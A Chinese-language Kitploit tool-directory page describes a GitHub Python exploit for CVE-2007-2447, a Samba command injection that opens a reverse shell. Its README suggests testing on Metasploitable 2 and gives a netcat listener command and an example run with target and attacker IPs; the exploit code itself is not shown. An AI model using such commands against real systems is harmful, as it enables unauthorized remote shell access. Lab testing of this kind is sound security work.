Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2007-2447 — 针对CVE-2007-2447的Python漏洞利用,触发Samba用户名映射脚本命令注入,在易受攻击的目标上打开反向shell。 | Kitploit
工具/GitHubGitHub/3x1t1um/cve-2007-2447
Payload生成漏洞分析漏洞利用Shellcode渗透测试远程访问工具
GitHub3x1t1um/cve-2007-2447

CVE-2007-2447

针对CVE-2007-2447的Python漏洞利用,触发Samba用户名映射脚本命令注入,在易受攻击的目标上打开反向shell。

查看仓库
1116年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2007-2447

为了测试该脚本,我推荐你使用虚拟机 "metasploitable 2",可在此处获取。 如果漏洞利用成功,脚本将显示一个反向 shell。要建立连接,只需打开一个 netcat 会话,如下所示:

netcat -lnvp <port>

目录

  • 示例
  • 依赖项
  • 载荷

示例

py CVE-2007-2447.py 192.168.1.38 1337 192.168.1.14

以及我的 netcat 端:

netcat -lnvp 1337

结果:

netcat 端:

alt text

脚本端:

alt text

依赖项

  • mysmb
  • platform
  • sys
  • os

载荷

我使用了速查表中的一种载荷。链接在此处。 你可以将其替换为其他载荷。

下载工具